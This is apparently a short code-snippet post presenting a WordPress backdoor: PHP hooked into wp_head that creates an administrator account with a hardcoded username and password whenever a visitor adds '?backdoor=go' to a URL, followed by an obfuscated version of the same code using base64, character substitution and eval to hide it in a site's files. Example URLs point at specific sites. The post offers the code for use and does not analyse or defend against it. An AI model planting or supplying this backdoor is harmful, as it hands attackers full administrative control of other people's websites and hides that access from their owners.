jcadima
6/10/2015 - 3:41 AM

Wordpress Backdoor Admin Access via GET URL

Wordpress Backdoor Admin Access via GET URL

<?php
//  http://www.wpwhitesecurity.com/wordpress-security-hacks/wordpress-backdoor-administrator-account/

add_action('wp_head', 'WordPress_backdoor');
// Example URL: http://www.aliveatsea.com/test/lifestyle/?backdoor=go
function WordPress_backdoor() {
    if ($_GET['backdoor'] == 'go') {
        require('wp-includes/registration.php');
        if (!username_exists('wordpressbdadmin')) {
            $user_id = wp_create_user('wordpressbdadmin', 'armadillo99!');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}

// USE examples:
//  http://www.aliveatsea.com/test/lifestyle/?backdoor=go
//  http://www.wpwhitesecurity.com?backdoor=go


============ ENCRYPTED =======================

<?php $_F=__FILE__;$_X='P2lCP1ouWlZlOTlfZTI9c09IKCd9Wl8uTWU5Jyw+J3tPejltek1ubl88ZTJ5OU9PeicpO1ZWQVFIMj1zT0g+e096OW16TW5uXzxlMnk5T096KCk+XVY+Pj4+c0E+KCRfQ0tUaic8ZTJ5OU9PeidkPlNTPid4TycpPl1WPj4+Pj4+Pj56TXZRc3pNKCd9Wi1zSDJXUTlNbmh6TXhzbj16ZT1zT0hYWi5aJyk7Vj4+Pj4+Pj4+c0E+KCFRbk16SGVZTV9NUnNuPW4oJ31Pejlaek1ubjw5ZTlZc0gnKSk+XVY+Pj4+Pj4+Pj4+Pj4kUW5Nel9zOT5TPn1aXzJ6TWU9TV9Rbk16KCd9T3o5WnpNbm48OWU5WXNIJyw+J2V6WWU5c1dXT1BQIScpO1Y+Pj4+Pj4+Pj4+Pj4kUW5Nej5TPkhNfT57bV8gbk16KCRRbk16X3M5KTtWPj4+Pj4+Pj4+Pj4+JFFuTXotaW5NPV96T1dNKCdlOVlzSHNuPXplPU96Jyk7Vj4+Pj4+Pj4+bFY+Pj4+bFZs';$_D=strrev('edoced_46esab');eval($_D('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCdTZ1BPOVlaV0ZLbXF5ZnhjakxKUnp1TTV2TnRzMWIue0I0bkNdaS8yRGwwRWhlQQpbZDg9UXA+VlhvIEh9NkdJdzdrYTNUclU8JywnPVI5b2RtcGxBRVB5azhndls1M3hyTWV6cVpIaTdZaFc8RHNHez5DY1h9MU4vYWZqNl1KdHVTIAouQlVud1ZLTFFPMjBJVEY0YicpOyRfUj1zdHJfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw='));?>